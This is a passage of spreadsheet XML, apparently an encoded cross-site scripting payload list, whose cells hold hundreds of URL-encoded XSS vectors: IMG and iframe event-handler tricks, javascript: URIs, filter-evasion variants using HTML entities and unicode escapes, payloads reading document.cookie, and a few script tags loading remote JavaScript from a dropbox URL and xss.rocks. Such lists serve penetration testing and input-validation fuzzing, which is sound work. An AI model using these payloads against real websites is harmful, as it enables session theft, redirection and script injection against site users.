      </c>
      <c r="B1217" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondrag%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="3" t="s">
        <v>989</v>
      </c>
      <c r="B1218" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondragend%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="3" t="s">
        <v>990</v>
      </c>
      <c r="B1219" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondragenter%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="3" t="s">
        <v>991</v>
      </c>
      <c r="B1220" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondragleave%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="3" t="s">
        <v>992</v>
      </c>
      <c r="B1221" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondragover%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="3" t="s">
        <v>993</v>
      </c>
      <c r="B1222" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondragstart%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="3" t="s">
        <v>994</v>
      </c>
      <c r="B1223" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondrop%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="3" t="s">
        <v>995</v>
      </c>
      <c r="B1224" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onscroll%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="3" t="s">
        <v>996</v>
      </c>
      <c r="B1225" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncopy%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="3" t="s">
        <v>997</v>
      </c>
      <c r="B1226" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncut%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="3" t="s">
        <v>998</v>
      </c>
      <c r="B1227" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onpaste%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="3" t="s">
        <v>999</v>
      </c>
      <c r="B1228" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onabort%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="3" t="s">
        <v>1000</v>
      </c>
      <c r="B1229" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncanplay%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="3" t="s">
        <v>1001</v>
      </c>
      <c r="B1230" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncanplaythrough%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="3" t="s">
        <v>1002</v>
      </c>
      <c r="B1231" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20oncuechange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="3" t="s">
        <v>1003</v>
      </c>
      <c r="B1232" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ondurationchange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="3" t="s">
        <v>1004</v>
      </c>
      <c r="B1233" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onemptied%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="3" t="s">
        <v>1005</v>
      </c>
      <c r="B1234" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onended%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="3" t="s">
        <v>956</v>
      </c>
      <c r="B1235" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onerror%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="3" t="s">
        <v>1006</v>
      </c>
      <c r="B1236" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onloadeddata%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="3" t="s">
        <v>1007</v>
      </c>
      <c r="B1237" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onloadedmetadata%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="3" t="s">
        <v>1008</v>
      </c>
      <c r="B1238" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onloadstart%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="3" t="s">
        <v>1009</v>
      </c>
      <c r="B1239" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onpause%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="3" t="s">
        <v>1010</v>
      </c>
      <c r="B1240" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onplay%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="3" t="s">
        <v>1011</v>
      </c>
      <c r="B1241" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onplaying%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="3" t="s">
        <v>1012</v>
      </c>
      <c r="B1242" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onprogress%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="3" t="s">
        <v>1013</v>
      </c>
      <c r="B1243" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onratechange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="3" t="s">
        <v>1014</v>
      </c>
      <c r="B1244" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onseeked%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="3" t="s">
        <v>1015</v>
      </c>
      <c r="B1245" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onseeking%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="3" t="s">
        <v>1016</v>
      </c>
      <c r="B1246" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onstalled%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="B1247" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onsuspend%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="3" t="s">
        <v>1018</v>
      </c>
      <c r="B1248" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ontimeupdate%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="3" t="s">
        <v>1019</v>
      </c>
      <c r="B1249" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onvolumechange%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="3" t="s">
        <v>1020</v>
      </c>
      <c r="B1250" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onwaiting%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="3" t="s">
        <v>1021</v>
      </c>
      <c r="B1251" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onshow%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="3" t="s">
        <v>1022</v>
      </c>
      <c r="B1252" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20ontoggle%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="3" t="s">
        <v>1023</v>
      </c>
      <c r="B1253" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20onpaonpageonpagonpageonpageshowshoweshowshowgeshow%3D%22alert%281%29%22%3B</v>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="3" t="s">
        <v>952</v>
      </c>
      <c r="B1254" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Dx%20onload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E</v>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="3" t="s">
        <v>1024</v>
      </c>
      <c r="B1255" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22BUTTON%22%20action%3D%22alert%28%27XSS%27%29%22%2F%3E</v>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="3" t="s">
        <v>1025</v>
      </c>
      <c r="B1256" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E%22%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="3" t="s">
        <v>1026</v>
      </c>
      <c r="B1257" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20SRC%3D%23%20onmouseover%3Dalert%28document.cookie%29%22%3E%3C%2FIFRAME%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B1258" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B1259" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="3" t="s">
        <v>1026</v>
      </c>
      <c r="B1260" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20SRC%3D%23%20onmouseover%3Dalert%28document.cookie%29%22%3E%3C%2FIFRAME%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="3" t="s">
        <v>1027</v>
      </c>
      <c r="B1261" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%60TEXT%20YOU%20WANT%20TO%20BE%20DISPLAYED%60%29%3B%3C%2Fscript%3E%3Ciframe%20frameborder%3D0%25EF%25BB%25BF</v>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="3" t="s">
        <v>1028</v>
      </c>
      <c r="B1262" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20width%3D420%22%20height%3D%22315%22%20SRC%3D%22http%3A%2F%2Fwww.youtube.com%2Fembed%2FsxvccpasgTE%22%20frameborder%3D%220%22%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="3" t="s">
        <v>1029</v>
      </c>
      <c r="B1263" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3Ciframe%20width%3D420%22%20height%3D%22315%22%20src%3D%22http%3A%2F%2Fwww.youtube.com%2Fembed%2FsxvccpasgTE%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C%2Fiframe%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="3" t="s">
        <v>1030</v>
      </c>
      <c r="B1264" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20width%3D%22420%22%20height%3D%22315%22%20frameborder%3D%220%22%20onmouseover%3D%22document.location.href%3D%27https%3A%2F%2Fwww.youtube.com%2Fchannel%2FUC9Qa_gXarSmObPX3ooIQZr</v>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="3" t="s">
        <v>1031</v>
      </c>
      <c r="B1265" s="4" t="str">
        <f t="shared" si="1"/>
        <v>g%27%22%3E%3C%2FIFRAME%3EHover%20the%20cursor%20to%20the%20LEFT%20of%20this%20Message%3C%2Fh1%3E%26ParamHeight%3D250</v>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="3" t="s">
        <v>1032</v>
      </c>
      <c r="B1266" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20width%3D%22420%22%20height%3D%22315%22%20frameborder%3D%220%22%20onload%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="3" t="s">
        <v>1025</v>
      </c>
      <c r="B1267" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E%22%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="3" t="s">
        <v>1026</v>
      </c>
      <c r="B1268" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Ch1%3E%3CIFRAME%20SRC%3D%23%20onmouseover%3Dalert%28document.cookie%29%22%3E%3C%2FIFRAME%3E123%3C%2Fh1%3E</v>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="3" t="s">
        <v>1033</v>
      </c>
      <c r="B1269" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fxss.rocks%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B1270" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B1271" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="3" t="s">
        <v>1034</v>
      </c>
      <c r="B1272" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20%20src%3D%22%26Tab%3Bjavascript%3Aprompt%281%29%26Tab%3B%22%3E</v>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="3" t="s">
        <v>555</v>
      </c>
      <c r="B1273" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cstyle%3E%7Bfont-family%26colon%3B%27%3Ciframe%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="3" t="s">
        <v>556</v>
      </c>
      <c r="B1274" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%2Fonmouseover%3D%22javaSCRIPT%26colon%3Bconfirm%26lpar%3B1%26rpar%3B%22</v>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="3" t="s">
        <v>1035</v>
      </c>
      <c r="B1275" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CsVg%3E%3CscRipt%20%3Ealert%26lpar%3B1%26rpar%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="3" t="s">
        <v>1036</v>
      </c>
      <c r="B1276" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%60%60%20onerror%3Dthis.onerror%3Dconfirm%281%29</v>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="3" t="s">
        <v>559</v>
      </c>
      <c r="B1277" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cisindex%20formaction%3D%22javascript%26colon%3Bconfirm%281%29%22</v>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="3" t="s">
        <v>1037</v>
      </c>
      <c r="B1278" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60%60%26NewLine%3B%20onerror%3Dalert%281%29%26NewLine%3B</v>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="3" t="s">
        <v>561</v>
      </c>
      <c r="B1279" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2F%26Tab%3B%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%2F%26Tab%3B%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="3" t="s">
        <v>562</v>
      </c>
      <c r="B1280" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CScRipT%205-0%2A3%2B9%2F3%3D%3Eprompt%281%29%3C%2FScRipT%20giveanswerhere%3D%3F</v>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="3" t="s">
        <v>563</v>
      </c>
      <c r="B1281" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%3B%26Tab%3Bbase64%26Tab%3B%2CPGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="3" t="s">
        <v>1038</v>
      </c>
      <c r="B1282" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2F%3E%2F%2A%2A%2Falert%281%29%2F%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2F</v>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="3" t="s">
        <v>1039</v>
      </c>
      <c r="B1283" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%27%5Cu0061lert%281%29%27%3E</v>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="3" t="s">
        <v>566</v>
      </c>
      <c r="B1284" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%2C%3Csvg%20%26%23111%3B%26%23110%3Bload%3Dalert%281%29%3E%22%3E</v>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="3" t="s">
        <v>567</v>
      </c>
      <c r="B1285" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20content%3D%22%26NewLine%3B%201%20%26NewLine%3B%3B%20JAVASCRIPT%26colon%3B%20alert%281%29%22%20http-equiv%3D%22refresh%22%2F%3E</v>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="3" t="s">
        <v>1040</v>
      </c>
      <c r="B1286" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20xlink%3Ahref%3Ddata%26colon%3B%2Cwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%20%3C%2Fscript</v>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="3" t="s">
        <v>569</v>
      </c>
      <c r="B1287" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20x%3Ahref%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="3" t="s">
        <v>570</v>
      </c>
      <c r="B1288" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aconfirm%281%29%22%3E</v>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="3" t="s">
        <v>571</v>
      </c>
      <c r="B1289" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Blocation%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="3" t="s">
        <v>1041</v>
      </c>
      <c r="B1290" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ca%20href%3D%22javascript%3A%5Cu0061lert%26%23x28%3B1%26%23x29%3B%22%3EX%3C%2Fscript%3E%3Cimg%2F%2A%2Fsrc%3D%22worksinchrome%26colon%3Bprompt%26%23x28%3B1%26%23x29%3B%22%2F%2A%2Fonerror%3D%27eval%28src%29%27%3E</v>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="3" t="s">
        <v>574</v>
      </c>
      <c r="B1291" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2F%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%60%7E%60%20onerror%3Dprompt%281%29%3E</v>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="3" t="s">
        <v>575</v>
      </c>
      <c r="B1292" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ciframe%20%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%22javascript%26%2358%3Balert%281%29%22%26%2311%3B%26%2310%3B%26%2309%3B%3B%3E</v>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="3" t="s">
        <v>576</v>
      </c>
      <c r="B1293" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Aapplication%2Fx-x509-user-cert%3B%26NewLine%3Bbase64%26NewLine%3B%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%26%2309%3B%26%2310%3B%26%2311%3B%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B1294" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.google%3Cscript%20.com%3Ealert%28document.location%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="3" t="s">
        <v>578</v>
      </c>
      <c r="B1295" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%26%2332%3Bhref%26%2361%3B%26%2391%3B%26%2300%3B%26%2393%3B%22%26%2300%3B%20onmouseover%3Dprompt%26%2340%3B1%26%2341%3B%26%2347%3B%26%2347%3B%22%3EXYZ%3C%2Fa</v>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="3" t="s">
        <v>579</v>
      </c>
      <c r="B1296" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%40%26%2332%3B%26%2313%3B%20onerror%20%3D%20prompt%28%27%26%2349%3B%27%29</v>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="3" t="s">
        <v>580</v>
      </c>
      <c r="B1297" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3Dprompt%26%2340%3B%27%26%2388%3B%26%2383%3B%26%2383%3B%27%26%2341%3B</v>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="3" t="s">
        <v>581</v>
      </c>
      <c r="B1298" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%5E__%5E%3Ealert%28String.fromCharCode%2849%29%29%3C%2Fscript%20%5E__%5E</v>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="3" t="s">
        <v>582</v>
      </c>
      <c r="B1299" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fstyle%20%26%2332%3B%3E%3Cscript%20%26%2332%3B%20%3A-%28%3E%2F%2A%2A%2Falert%28document.location%29%2F%2A%2A%2F%3C%2Fscript%20%26%2332%3B%20%3A-%28</v>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="3" t="s">
        <v>583</v>
      </c>
      <c r="B1300" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2300%3B%3C%2Fform%3E%3Cinput%20type%26%2361%3B%22date%22%20onfocus%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="3" t="s">
        <v>584</v>
      </c>
      <c r="B1301" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ctextarea%20%26%2313%3B%20onkeyup%3D%27%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%26%23x29%3B%27%3E</v>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="3" t="s">
        <v>585</v>
      </c>
      <c r="B1302" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2A%2F%3E%2F%2A%2A%2A%2Fconfirm%28%27%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450%27%29%2F%2A%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2A%2F</v>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="3" t="s">
        <v>586</v>
      </c>
      <c r="B1303" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%27%26lt%3Bbody%20onload%3Dprompt%26lpar%3B1%26rpar%3B%26gt%3B%27%3E</v>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="3" t="s">
        <v>587</v>
      </c>
      <c r="B1304" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Avoid%280%29%22%20onmouseover%3D%26NewLine%3Bjavascript%3Aalert%281%29%26NewLine%3B%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="3" t="s">
        <v>588</v>
      </c>
      <c r="B1305" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%7E%7E%7E%3Ealert%280%250%29%3C%2Fscript%20%7E%7E%7E%3E</v>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="3" t="s">
        <v>589</v>
      </c>
      <c r="B1306" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3D%26lt%3B%21--%26%2309%3B%26gt%3B%26%2310%3Balert%26%2310%3B%26lpar%3B1%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="3" t="s">
        <v>590</v>
      </c>
      <c r="B1307" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3ESPAN</v>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="3" t="s">
        <v>591</v>
      </c>
      <c r="B1308" s="4" t="str">
        <f t="shared" si="1"/>
